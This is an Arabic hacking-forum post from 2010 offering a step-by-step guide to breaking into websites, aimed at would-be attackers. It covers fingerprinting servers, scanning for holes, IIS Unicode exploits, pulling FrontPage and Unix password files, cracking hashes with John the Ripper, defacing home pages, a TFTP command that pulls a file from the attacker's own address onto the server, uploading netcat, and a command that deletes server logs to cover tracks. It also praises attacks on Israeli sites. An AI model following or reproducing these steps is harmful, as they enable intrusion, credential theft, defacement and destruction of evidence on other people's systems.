Dev-Hack



انضم إلى المنتدى ، فالأمر سريع وسهل

Dev-Hack

Dev-Hack

هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.
Dev-Hack

جميع برامج الاخترق و تعليم الاخترق و دورات الاخترق

تم افتتاح افرع جديد لمنتدى المنتدى هو www.sport-sat.com الرجاء التسجيل به

4 مشترك

    جميع الطرق الي تخترق فيه موقع شرح كامل فقط على dev-hack

    A-Ghazaleh
    A-Ghazaleh
    Admin


    عدد المساهمات : 96
    السٌّمعَة : 24
    تاريخ التسجيل : 07/10/2010

    جميع الطرق الي تخترق فيه موقع شرح كامل فقط على dev-hack Empty جميع الطرق الي تخترق فيه موقع شرح كامل فقط على dev-hack

    مُساهمة من طرف A-Ghazaleh الإثنين نوفمبر 08, 2010 6:55 pm



    السلام عليكم ورحمة الله تعالى و بركاته
    اليوم يا شباب جايب لكم شيئ مهم جدا
    وهو :
    جميع طرق اختراق المواقع

    مهم جدا جدا جدا
    VIP
    بسم الله نبدء:

    (اختراق المواقع)

    1- (اساسيات وتعاريف)
    تلنت: (Telnet) - 1
    و هو برنامج صغير موجود في الويندوز . أي أن باستطاعة هذا البرنامج الإتصال بالسيرفر
    أوالخادم و اجراء بعض العمليات كل حسب مستواها و حالتها . يستخدمه الهاكرز غالبا لمعرفة نظام تشغيل الموقع و السيرفر التابع له ، و للإتصال بالسيرفر عبر بورت معين و خصوصا بورت الإف تي بي (21) للدخول الى الموقع بطريقة خفية
    لعرض ملفات الموقع و سحب ملف الباسورد او غيره من البيانات.
    لاستخدام البرنامج ، اذهب الى
    Start ==> Run ==> telnet
    و ستظهر شاشة التلنت.
    ------------------------------------------------------------------------
    برامج السكان: (Scanner) - 2
    و هي برامج موجودة للمسح على المواقع و كشف ثغراتها إن وجدت ، فهي سريعة،
    كما أنها تملك قاعدة بيانات واسعة و كبيرة تحتوي على الثغرات أو الاكسبلويت
    التي يتم تطبيقها على الموقع لرؤية فيما اذا كان السيرفر يعاني من احدى هذه الثغرات أم لا . و من أمثلة
    Shadow Security Scanner و Stealth و Omran Fast
    هذه البرامج، برنامج
    Scanner
    و لهذه البرامج أنواع مختلفة ، منها التي تقوم بعمل سكان على نظام أو سيرفر
    معين مثل البرامج المختصة بالسكان على سيرفرات الـ
    IIS
    على ثغرات السي جي اي فقط و منها برامج المسح
    CGI
    -----------------------------------------------------------------------
    اكسبلويت: (Exploits) - 3
    هي برامج تنفيذية تنفذ من خلال المتصفح . و لها عنوان
    URL
    ، تقوم هذه الإكسبلويتات بعرض ملفات الموقع و تقوم بعضها بالدخول الى
    السيرفر و التجول فيه ، كما توجد اكسبلويتات تقوم بشن هجوم على بورت معين
    في السيرفر لعمل كراش له ، و هذا ما يسمى بـ
    Buffer Over Flow Exploits
    هناك أنواع من الإكسبلويت ، فمنها ال
    CGI Exploits
    CGI Bugs
    Unicodes Exploits
    Buffer Over Flow Exploits
    PHP Exploits
    DOS Exploits
    والتي تقوم بعملية حجب الخدمة للسيرفر إن وجد فيها الثغرة المطلوبة لهذا الهجوم و ان لم يكن على السيرفر أي فايرول
    Fire Wall
    .وهناك بعض الإكسبلويتات المكتوبة بلغة السي و يكون
    امتدادها (.c)
    هذه الإكسبلويتات بالذات تحتاج الى كومبايلر او برنامجا لترجمتها و تحويها
    الى اكسبلويت تنفيذي عادي يستخدم من خلال المتصفح ، و لتحويل
    الإكسبلويت المكتوب بلغة السي هذه الى برنامجا تنفيذيا ، نحتاج إما الى
    نظام التشغيل لينوكس او يونكس ، او الى اي كومبايلر يعمل ضمن نظام التشغيل
    ويندوز . أشهر هذه الكومبايلرات ( المترجمات أو المحولات ) برنامج اسمه
    Borland C++ Compiler
    و هي تعمل تحت نظام التشغيل ويندوز كما ذكرنا سابقا.
    ----------------------------------------------------------------------
    الجدار الناري: (FireWall) - 4
    هي برامج تستعملها السيرفرات لحمايتها من الولوج الغير شرعي لنظام ملفاتها من قبل المتطفلين هي تمثل الحماية للسيرفر طبعا ولكني أنوه بأن الفايروات المستخدمة لحماية السيرفرات (المواقع) تختلف عن تلك التي تستخدم لحماية الأجهزة.
    ----------------------------------------------------------------------
    هو ملف الباسورد المظلل: (Token) - 5
    (Shadowed Passwd)
    والذي يكون فيه الباسورد على شكل
    *
    او
    x
    البحث عن ملف الباسورد الغير المظلل و الذي يسمى إن وجدت ملف الباسورد مظللا ، فيجب
    Shadow file
    تجده في
    /etc/shadow
    ----------------------------------------------------------------------
    Anonymouse) - 6
    هي الوضعية الخفية و المجهولة التي تدخل فيها الى الموقع المراد
    اختراقه. هناك خاصية في برامج الاف تي بي بنفس الإسم ، تستطيع ان تستعملها
    في الدخول المجهول الى السيرفر و سحب الملفات منه.
    ----------------------------------------------------------------------
    Valnerableties) - 7
    أي الثغرات أو مواضع الضعف الغير محصنة أو القابلة للعطب
    و التي يعاني منها السيرفر و التي قد تشكل خطرا أمنيا عليه مما يؤدي الى
    استغلالها من قبل الهاكرز في مهاجمة السيرفر و اختراقه أو تدميره .
    ما هي مفردها ؟
    Valnerable
    أي ثغرة أو بالأصح موضع الضعف والمكان الغير مؤمن بشكل سليم . و تكثر هذه الكلمة في القوائم البريدية للمواقع المهتمة بالسيكيوريتي و أمن الشبكات و غيرها كالقائمة البريدية الموجودة في موقع
    Security Focus
    أو بوق تراك او غيرها.
    ----------------------------------------------------------------------
    : ملف الباسوورد(passwd file) - 8
    هو الملف الذي يحتوي على باسورد الروت و باسوردات الأشخاص
    المصرح لهم بالدخول الى السيرفر . باسورد الموقع موجود في نفس الملف طبعا.
    ----------------------------------------------------------------------
    الجذر: (root) - 9
    و هو المستخدم الجذري و الرئيسي للنظام ، له كل الصلاحيات
    في التعامل مع ملفات الموقع و السيرفر من إزالة أو اضافة أو تعديل للملفات.
    غالبا ما يكون باسورد الروت هو باسورد الموقع نفسه في المواقع التي تعمل ضمن
    نظام التشغيل لينوكس او يونكس و سولاري و فري بي اس دي و غيرها .
    ----------------------------------------------------------------------
    السيرفر: (Server) - 10
    هو الجهاز المستضيف للموقع ، اذ أن كل ملفات الموقع توضع فيه
    فهو جهاز كمبيوتر عاد كغيره من الأجهزة لكنه ذو امكانيات عالية ككبر حجم القرص
    الصلب و سرعته الهائلة ، و هو متصل بالإنترنت 24 ساعة ، و هذا هو سبب كون

    المواقع شغالة 24 على الإنترنت . قد يملك و يستضيف السيرفر أكثر من موقع
    واحد، و هذا يعتمد من سيرفر لآخر و من شركة لأخرى. ضربة الهاكرز طبعا هي اختراق
    السيرفر الذي يملك الكثير من المواقع ، فيسهل حينها اختراق جميع المواقع التي
    تندرج تحته مما يؤدي إما الى تدميرها أو العبث في ملفاتها أو تشويه واجهتها أو
    سرقة بياناتها و تدميرها أو مسحها من النت تماما ، و هذا ما يحدث للمواقع
    الإسرائيلية و بكثرة و لله الحمد .( جزاكم الله خيرا أيها المجاهدون)
    -----------------------------------------------------------------------
    بوفر أوفر فلو: ( Buffer over Flow ) - 11
    وهي نوع من أنواع الاكسبلويتات التي تستعمل لشن هجوم الطفح على نقطة معينة من السيرفر مثل الهجوم على بورت الإف تي بي أو غيره لأجل اضعاف اتصال السيرفر و فصل اتصاله بهذا بهذا البورت و لالغاء الرقعة الموجودة بها كي يتم استغلالها مجددا - بعد عمل الكراش لها طبعا - يتم استغلالها في معاودة الإتصال لها و بسهولة و دون وجود أي رقع او حواجز و سحب البيانات منها . و هي شبيهة نوعا ما بعملية حجب الخدمة اذ أنها تقوم بعملية اوفر لود على جزء مركز من السيرفر .
    -----------------------------------------------------------------------
    كثير من الهكرز يحبون ان يطلقوا على كل من ال - 12
    pc , servers , supercomputers
    كلمه
    BOX
    -----------------------------------------------------------------------
    13- النظام الذي سوف نقوم باختراقه يحتوي عاده على العديد من اليوزرز ..بالاضافه لليوزرز
    تسطيع ان تطلق على الرئيس هناك كلمه
    superuser
    وهو يكون روت
    وهو الادمين او المدير على النظام....
    -----------------------------------------------------------------------
    14- ماهو الشيل اكاونت: هو عباره عن خدمه حيث يمكنك من خلالها التحكم في جهاز من بعيد و هذا الجهاز عليه نظام اليونيكس.
    -----------------------------------------------------------------------
    15- احنا اخترقنا موقع لازم نمسح خطواتنا علشان لايعرفنا صاحب الموقع ويئذينا كيف؟
    /c+del+c:/winnt/system32/logfiles/*.log
    نكتب هذا الامر بالدوس
    او نروح السي وبعدين فايل ويندوز بعدين فايل
    system32
    بعدين
    امسح ملف اسمة
    *
    وامتدادة
    log
    -----------------------------------------------------------------------
    16- الحين احنا اخترقنا موقع ونبي نغير صفحة البداية ونكتب تم اختراق هذا الموقع كيف؟
    تقدر تغير الصفحه الرئيسه لما يكون الباسورد حق الموقع عندك بعدين تدخل عليه بعدين تروح لملف اسموا
    index
    افتحوا او الغيه و حط ملف بنفس الاسم بالأشياء الي تبيها ببرنامج اسمه
    WS_FTP PRO
    والبرنامج سهل اللي يبي شرح يقولي

    ------------------------------------------------------------------------------------------------
    17- ( برامج للبحث عن ثغرات وأنظمة المواقع وبعض معلوماتها )
    هذي من أفضل برامج البحث عن الثغرات وانشاء الله تعجبكم انت بس ادخل وتلقى:
    ============================================
    1-N-Stealth
    تحميل
    أداة رائعة وقوية وتتميز باكتشاف نظام الموقع وثغراته
    **************************************************
    *************
    2- Shadow Security Scanner
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    برنامج ذو شهرة عالية وفعالية كبيرة في فحص المواقع من المنافذ والثغرات
    **************************************************
    *************
    3- Omran Scanner
    تحميل
    برنامج عربي من برمجة الأخ/عمران الغامدي ولابأس به لاكتشاف الثغرات ويحتوي على ملفات للبحث مثل
    Linux-Unix-NT
    **************************************************
    *************
    4- CGI Scanner
    تحميل
    مختص في البحث عن ثغرات
    cgi
    وهو الأفضل في عمل ذلك
    **************************************************
    *************
    5- UniScan
    تحميل
    كالسابق ولكن هذا البرنامج خاص بفحص ثغرات UNicode
    **************************************************
    *************
    6- Retina Apache Chunked
    تحميل
    للبحث عن الأجهزة والمواقع التي تملك ثغرة
    Apache
    **************************************************
    *************
    7- SamiScan
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    أداة رائعة وعربية يعرض نظام التشغيل والملقم والعنوان الحقيقي ويحتوي على أربع ملفات لايجادالثغرات
    cfusion.txt, cgi.txt, cgi2.txt, NT.txt
    **************************************************
    *************
    8- voideye
    تحميل
    نسمع عنه كثيرا وهو لأنه أقدم برنامج في البحث عن الثغرات يملك واجهة جميلة ولكني لاأفضله على
    sss
    **************************************************
    *************
    الملقمات اشهرها اثنين: - 18
    IIS:
    من مايكروسوفت وهذه مليانة ثغرات. (ومواقع قليل مقفلة ثغراتها).
    apache:
    من مجموعة مبرمجين متوزعين في انحاء العالم واختراقها شبه صعب.

    -----------------------------------------------------------------
    19- اول خطوة في الاختراق هي اخذ المعلومات:
    يعني نعرف الموقع شنو الملقم اللي شغال عليه والنظام والخدمات اللي يدعمها.
    طيب الحين عندنا موقع وشلون نعرف نظام التشغيل والملقم والخدمات والمعلومات كلها عندك الموقع
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    ملاحظة: نكتب الموقع من غير
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    ولا
    /
    اللي بالاخير
    او نستخدم التلنت.
    1 - مثال على ملقمات اي اي اس:
    راح يطلع لنا التالي
    The site [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] is running Microsoft-IIS/5.0 on Windows 2000
    طيب الحين عرفنا معلومتين مهمتين
    اول شيء انه شغال على الملقم
    IIS5.0
    ثاني شيء شغال على نظام ويندوز 2000
    اول شيء نجرب ثغرات
    IIS5.0
    عليه
    إذا مانفع شيء نشوف ثغرات نظام ويندوز 2000
    طيب الحين فيه حاجة اسمها يوني كود هذه تخترق فيها عن طريق المتصفح وماتمشي إلا مع ملقمات
    IIS
    وهي عبارة عن عناوين طويلة تحطها بعد عنوان الموقع.
    طيب لنفرض انه ماطلع فيها ثغرات؟
    نشوف محتويات الموقع نفسه
    نشوف إن كان عنده سجل زوار او منتدى او ....
    2 - مثال على ملقمات اباتشي:
    ناخذ مثال موقع ارانك
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    لو حللناه بالنيت كرافت راح نشوف النتيجة التالية:
    The site [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] is running Apache/1.3.20 (Unix) mod_gzip/1.3.19.1a mod_perl/1.26 mod_bwlimited/0.8 PHP/4.0.6 mod_log_bytes/0.3 FrontPage/5.0.2.2510 mod_ssl/2.8.4 OpenSSL/0.9.6 on Linux
    هنا يهمنا ثلاث اشياء:-
    1- الملقم وهو:
    apache 1.3.20
    2- ودعم فرونت بيج وهذه مليانة ثغرات
    FrontPage/5.0.2.2510
    3- النظام وهو
    Linux
    -=-=-=-=-=-=-=-=-=-=-=-=-=-=-
    الملقم:
    اول شيء اباتشي من الملقمات الصعبة الإختراق إلا بعض الإصدارات منها فنحط هذه على جنب.
    -=-=-=-=-=-=-=-=-=-=-=-=-=-=-
    دعم الفرونت بيج زي ماقلنا الفرونت بيج مليان ثغرات وثغراته قوية وكثيرة تقريبا منها مجلد
    _vti_pvt
    و
    _private
    هذه اللي نحتاجها غيره مامنه فايدة داخل المجلدين راح نلاقي اربع ملفات مهمة وهي
    service.pwd
    و
    users.pwd
    و
    authors.pwd
    و
    adminstators.pwd
    ويعتبر هذا اخطر ملف طيب لو قدرنا ننزل واحد من الملفات هذه (ملاحظة الثغرة هذه موجودة ب 70% من المواقع الموجودة عالنت) لو نزلناها نفتحها بالمفكرة ونلاقي السطر هذا على سبيل المثال
    goodyco:CalXS8USl4TGM
    وهذا من موقع قودي
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    طيب الحين
    goodyco
    اليوزر والباسورد مشفر واللي هو
    CalXS8USl4TGM
    وشلون ينفك؟
    ينفك ببرنامج اسمه
    john the repaier
    ( شرح الاستخدام موجود في اخر موضوع في هذا المجلد)
    -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
    طيب نروح للفقرة الثالثة واللي هي النظام زي ماشفنا النظام هو لينكس لكن لينكس ايش؟ فيه ريد هات و ماندريك وفيه منه إصدارت كثير وثغرات اكثر لكن هنا راح تواجهك مشكلتين
    اول شيء معرفة النظام تقدر تطلعه من ابدا وتشغيل ال
    telnet
    واكتب عنوان الموقع يطلع لك النظام فوق نوعه وإصدارته المشكلة الثانية لازم يكون عندك لينكس اصلا علشان ثغراته بلغة ال
    c
    وهذه ماتشتغل إلا عاللينكس فقط.
    ----------------------------------------------------------------------
    20- (مواقع تطلعلك ثغرات الانظمة والويندوز والمنتديات وووو....)
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    الموقع هذا خطير جداً جداً تروح ل
    EXPLOITS
    اللي عاليسار وتختار اول اختيار هنا ثغرات جميع الانظمة من لينكس و ويندوز و و و الخ.. ومنوعة من
    c
    و
    perl
    و يوني كود.
    -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    هذا الموقع مفيد جدا تكتب مثلا فوق بالمربع اللي عاليمين
    IIS او apache
    او منتدى واصدارته او اي برنامج ويطلع لك ثغراته.
    -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
    أرشيف لثغرات
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    أرشيف لثغرات
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    أرشيف لثغرات
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    أرشيف لثغرات
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    أرشيف لثغرات
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    مواقع لثغرات
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    ---------------------------------------------------------------------
    20- هناك انظمة وملقمات كثيرة منها:
    Apache (الملقم)
    IIS(الملقم)
    SunOS(الملقم)
    FreeBSD (My BaBe)(الملقم)
    OpenBSD(الملقم)
    NetBSD(الملقم)
    AIX(الملقم)
    IRIX(الملقم)
    NetScape(الملقم)
    Enterprise(الملقم)
    Windows/NT/2000/xp (نظام التشغيل)
    Linux(نظام الشتغيل )
    -------------------------------------------------------------------
    له ست مجلدات) 21- (اليونكس

    خاص بالملفات الثنائيه يعني اللي تشغل النظام bin
    ملفات ادارة النظام ومن ظمنها الرووت اللي هو حساب مدير النظام او passwd etc
    ملفات الاجهزه dev
    مكتبات الربط الديناميكي اللي تساعد النظام في التشغيل lib
    الملفات الموقته او غير الثابته tmp
    اسماء المستخدمين وكلمات السر اللي لهم حسابت بالنظام usr


    --------------------------------------------------------------------
    22- (اوامر الاف تي بي)
    لكي تعرف ما يحتويه الهارد ديسك Pwd
    لإقتحام مجلد مثال Cd black في هدا المثال قمت بإقتحام مجلد المسمى بلاك Cd
    لكي يتضح لك محتوى المجلد أو الهارد ديسك Ls
    لكي تحمل الى سطح المكتب حق جهازك مثال Get black.exe Get
    العملية العكسية ل Get يعني ان تأخد ملف من سطح المكتب حق جهازك و تضعه في في جهاز الضحية مثال Put black.exe Put
    لقطع الإتصال مع الضحية Clos


    يمكنك تشغيل الاف تي بي من الويندوز عن طريق :
    START > RUN > ftp -n hostname
    ----------------------------------------------------------------------------
    23- بورتات برامج:-
    7 echo
    21 telnet
    23 ftp
    25 smtp
    80 http
    110 POP
    ----------------------------------------------------------------------------
    c - 24
    هو برنامج سي لكنه سورس كود فقط واغلب الثغرات التي يتم كتابتها بالسي ولاكن المشكلة انه لايمكن تشغيله تحت بيئة ويندوزفيجب ان يكون عندك
    Linux او ****l Account
    ----------------------------------------------------------------------------
    25 - ملاحظة رسائل لأخطاء ومن أشهرها الرسالة 404
    Error
    وهي تظهر عند طلب ملف غير موجود بالموقع وعند ظهور هذه الصفحة انظر
    إلى أسفل الصفحة وقد تجد معلومات مثل إصدارة ملقم الويب وهذه معلومات غير مضرة أو خطير لكنها تفيد في عملية الاختراق.
    ---------------------------------------------------------------------------
    26 -(كيف تحصل على شيل اكاونت مجانا)

    و تنقسم الشيل اكونتس الي نوعين:
    1-restricted
    2-non-restricted
    و الفرق بينهما ان
    restricted
    مدفوع القيمه و يمكنك من تنفيذ اي
    command
    اما ال
    non restricted
    فهو مجاني
    و لكن مشكلته انه لا يمكنك من تنفييذ كل الاوامر! لكي تحصل علي شيل اكونت مجانا يمكنك الحصول عليه من اي مزود شيل اكونتس علي الشبكه مثل
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    او الاتصال بمزود الخدمه و اطلب منه شيل اكونت طبعا سيسالك لماذا تريد الشيل اكونت اجب عليه بانك تريد استخدام و التدرب علي نظام اللينكس و اليونكس فيما بعد و هذي الاجابه كافيه لك يعطيك شيل اكونت و الشيل اكونتس مختلفه و تتميز فيما بينها
    بالتالي:
    1-telnet
    2-nslookup و الذي يعطيك معلومات عن المضيف
    3-ftp
    4-finger
    4-trace route
    5-dig و هذا الامر غير متاح غالبا في معظم الشيلز المجانيه
    6-netstat
    7-gcc و هذا كمبيلير للغه البرمجه c
    8-gzip لفك ضغط الملفات
    9-lynx متصفح للانترنت

    ------------------------------------------------------------------
    تغيير الصفحة الرئيسية للموقع وعملية الاب لوود بواسطة برنامج - 27
    .TFTP
    -=-=-=-=-=-=-=-=-=-=-=-=-
    قم بانشاء صفحة وضع شعارك عليها واحفظها باسم
    index.htm
    على الـ
    c:\
    قم بتشغيل برنامج
    TFTP
    :ونفذ الامر في الفقرة التالية
    /c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\ind ex. htm
    tftp.exe
    وهو البرنامج اللازم لعمل الاب لوود ويجب ان يكون شغال في حالة تنفيذ الامر
    "-i"
    وهو بمثابة باراميترز لزوم قراء البيانات في مكتبة الملفات
    1.1.1.1 رقم الايبي الخاص بك
    GET
    وهو الامر اللازم لطلب الملفات مابين الارسال والاستقبال
    index.htm
    اسم الملف بجهازك
    \inetpub\wwwroot\
    اسم الدليل في السيرفر
    index.htm
    اسم الملف على السيرفر
    -----------------------------------------------------------------
    تحاول أن تدخل لوحة التحكم معظم المواقع تكون لوحة تحكمها على الشكل - 28
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    أو
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    هذا في حال كان الموقع يستخدم الـ
    CPanel
    وهو البرنامج الأكثر شيوعاً ..
    ومن ثم تظهر لك نافذة اكتب فيها اسم المستخدمة وكلمة السر ..
    وتصير في الداخل.
    ----------------------------------------------------------------
    29- اماكن تواجد ملف باسوورد المواقع:
    Sunos 5.0 etc/shadow او etc/passwd
    Linux etc/shadow او etc/passwd
    BSD4.3 –RENO etc/master.passwd
    AIX etc/security/passwd
    NT ويندوز ******s/passwd
    ----------------------------------------------------------------
    30- كيف اتاكد انا الثغر شغالة ولا لا؟
    - جرب اللثغرة بواسطة الـ
    URL او الـ URI .
    ----------------------------------------------------------------
    31- كيف تسد ثغرات اي اي اس اذا كانت شغالة في موقعك؟
    (IIS4.0 on WinNT)
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    (IIS5.0 on Win2000)
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    ----------------------------------------------------------------
    32 - ما الفرق بين ملف الباسورد المشفر
    encryption
    والمضلل
    shadowed?
    -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
    الملف المضلل
    shadow file
    يكون مكان كلمة المرور رمز مثل
    *
    أو
    x
    أو
    #
    أو
    !
    وهذا مثال لها
    root:0Super-User:/:/sbin/sh
    لكن الملف المشفر تكون كلمة المرور مكتوبه ولكن مشفره مثل هذه
    root:Q71KBZlvYSnVw:0Super-User:/:/sbin/sh
    هنا تكون كلمة المرور المشفره هي: Q71KBZlvYSnVw
    -------------------------------------------------------------------
    وماذا لو كان ملف كلمة المرور مشفر ، كيف يتم كسره ؟ - 33
    -=-=-=-=-=-=-=-=-=-=-=-=-=-=-
    يتم كسر كلمة السر المشفرة ببرنامج جون ذا ريبر الذي ساضع طريقة عملة بالتفصيل في اخر الدرس وهذا البرنامج يقوم بتجربة 5000 كلمة بالثانية(سرعة جنونية) مما يجعله الاسرع في فك التشفير.
    -------------------------------------------------------------------
    34 -اذا كان ملف
    passwd
    مضلل ماذا تفعل؟
    الان جميع ملفات
    passwd
    تكون مضللة ولكن توجد طريقة لفكها
    اذا وجدت الملف مضلل يجب عليك البحث عن ملف الشادو
    shadow
    ماهي اماكن تواجد ملف
    shadow
    في الأنظمة؟
    وهذا الملف يوجد في امكنه معينه وكل نظام تشغيل له مكان يوضع به هذا الملف ، اليك الجدول التالي:
    Linux : /etc/shadow token = *
    SunOS : /etc/shadow token = يأخذ أشكال متعدده اشهرها هو *
    FreeBSD : /etc/master.passwd or /etc/shadow token = * والجديد هو x
    IRIX : /etc/shadow token = x
    AIX : /etc/security/passwd token = !
    ConvexOS : /etc/shadow or /etc/shadpw token = *
    -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
    token
    تعني الرمز الذي يوجد في الملف
    passwd
    وهذا يفيد في تسهيل المهمه ، يعني لو مثلا لقيت علامه ! بدل كلمه المرور فهذا يعني ان كلمة المرور مسجله في
    /etc/security/passwd
    ، لقد إستعنت بالجدول السابق ذكره ، مثال على ملف شادو ( ملف شادو هو الملف الذي تخزن فيه كلمة المرور الصحيحه).
    ملف الشادوا تكون الكلام الذي فيه مشفر
    الخظوة الأخيرة وهي دمج ملف
    shadow & passwd
    انصحك في دمج ملف الشادو مع ملف الباس بكتابة هذا الامر في برنامج جون ذا رباير وصلة البرنامج
    **********************************************
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    **********************************************
    انبه اولا من ان البرنامج مخصص لفك تشفير الملفات المشفرة ولكن يوجد في امر لدمج ملف الشادو مع ملف الباس وذلك لضمان عدم وقوع اخطاء عند الدمج
    الامر هو
    unshadow passwd.txt shadow.txt
    اذا لم تنجح العملية وتريد تطبيقها يدويا فهي سهلة ولكن لضمان عدم وقوع اخطاء عند الدمج فقط قم بتبديل علامة
    x
    التي تكون في ملف الباس ب اللام الموجود بدلا عنها في ملف الشادو تطبق العملية في كل علامة x
    تكون في ملف الباس
    -------------------------------------------------------------------
    35- فك تشفير ملف
    shadow
    asswd بعد دمجه مع ملف
    x وهو طريقة فك تشفير ملف
    passwd
    الدليل الكامل لكسر كلمات السر
    برنامج
    John the Ripper
    لكسر كلمات السر
    -----------------------------------------------------------------
    برنامج - 36
    (John the Ripper)
    احد افضل البرامج لكسر كلمات السر التي يحصل عليها المخترقون من الانظمة
    (nix*)
    وهذه الانظمة واخص الاصدارات الحديثة توفر نظام حماية إضافي لملف
    (PASSWD)
    بان يكون مضلل وعلى المخترق الحصول على ملف
    (SHADOW)
    لكي يحصل على ملف كلمات السر مشفرة ومن ثم يقوم بكسر هذا التشفير . هذه هي الوظيفة الاساسية واعتبرها من اهم الخطوات في اختراق الخوادم لانها تعطيك المفتاح .
    ----------------------------------------------------------------
    37 - كيف استغلال الباسورد:
    يمكنك استغلال باسورد الموقع في التلنت تدخل من التلنت وتفعل ماتريد
    او انك تدخل من الاف تي بي وهو الأسهل والمنتشر
    كيفية الدخول ب
    ftp
    يمكنك استخدام احد برامج ال
    ftp
    منها
    ws_ftp
    او
    CuteFTP 4.2.5 Build 10.4.1
    وعنوانه هنا للتحميل
    ---------------------------------------------------------------------
    38 - طريقة تنفيذ الثغرات:

    مكان تنفيذ الثغرات
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    فنحتاج الى نسخ ملف
    w3svc.exe
    الى مجلد
    inetpub\******s
    والامر يكون بهذه الطريقة:
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

    بعد نسخ ملف
    w3svc.exe
    الى مجلد
    inetpub\******s
    الان نقوم بتصفح الموقع من خلال الثغرة بهذه الطريقة
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
    كيفية معرفة مشكلة الـ
    Access Denied
    والحلول المتبعة لها .
    تتم معرفة مشكلة الـ
    Access Denied
    من خلال المحاولة في حذف أي ملف من أي امتداد ، فعند ظهور رسالة الـ
    Access Denied
    فاليك هذه الطرق حتى تتمكن من الكتابة على الملفات والتحكم اكثر على السيرفر :-

    1-لطريقة الاولى نسخ ملف الـ
    CMD
    الى دليل السيكربت بمسمى
    CMD1
    فسوف يتاح لك امكانية الكتابة باستخدام الامر
    Copy
    باستخدام هذا الامر
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

    - الطريقة الثانية بالتعامل مع الملف2
    ssinc.dll
    والطريقة كما يلي
    اولا انشاء صفحة باسم
    test.shtml
    تكون هذه الصفحة داخل مجلد
    wwwroot/hEx/test.shtml
    كتابة هذا الكود داخل الصفحة بحيث ان حرف
    A
    يتم كتابتة حتى يتعدى 2049 حرف
    الان يتم طلب الصفحة من خلال المتصفح
    [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
    الان سوف تظهر لك الصفحة
    الان تستطيع الكتابه وتم تخطي مشكلة الـ
    Access Denied
    اذا ظهرت لك صفحة الخطاء رقم 500 فمعناها انك لم تقم بتطبيق الطريقة بالشكل الصحيح وعليك اعادة المحاولة .
    3-الطريقة الثالثة باستخدام برنامج
    NC.exe
    بحيث يتم عمل اب لوود لهذا الملف داخل مجلد الـ
    Temp
    في دليل الويندوز ومنه يتم تنفيذ الاوامر من خلال موجة الدوز وللمعلومية مجلد الـ
    Temp
    مفتوح لعمليات الاب لوود .
    4-الطريقة الرابعة وهي من خلال عمل كراش للسيرفر باستخدام البرامج اللازمة لهذا الغرض وهذه الطريقة غير مجديه في كثير من الاحيان .
    5-البحث عن ملفات
    root.exe ، sensepost.exe ، ****l.exe ، w3svc.exe ونسخها الى مجلد c:\inetpub\******s
    وتطبيق الثغرة من خلالها .
    -------------------------------------------------------------------------

    3-(شرح البرامج)
    1- شرح برنامج جون ذاريبر

    حط البرنامج في السي
    ملاحظة احفظ الباسوورد في نفس ملف البرنامج في ملف
    .txt
    وتسميه
    password
    عشان تمشي مع الشرح
    -=-=-=-=-=-=-=-=-=-=-=-
    س:\البرنامج كيف يشتغل؟
    البرنامج يشتغل على الدوس ادخل على الدوس واكتب
    cd..
    الين يصير شكله كذا
    <:c
    اكتب john
    الحين ناقصك اوامر
    ماهي اوامر البرنامج؟
    -=-=-=-=-=-=-=-=-=-=-=-
    1-امر يبحث لك عن الكلمات المحتملة من خلال قوائم بكلمات السر وصيغته كالتالي:
    john -w:wordlist.txt password.txt
    ملف
    wordlist
    هي كلمات السر المحتمله و
    password
    كلمة السر المشفرة
    (لا انصح بهذا الاختيار)
    -=-=-=-=-=-=-=-=-=-=-=-
    2-امر يبحث لك عن كلمات السر التي تكون مطابقة لاسم المستخدم وصيغته:
    john -single passwd.txt
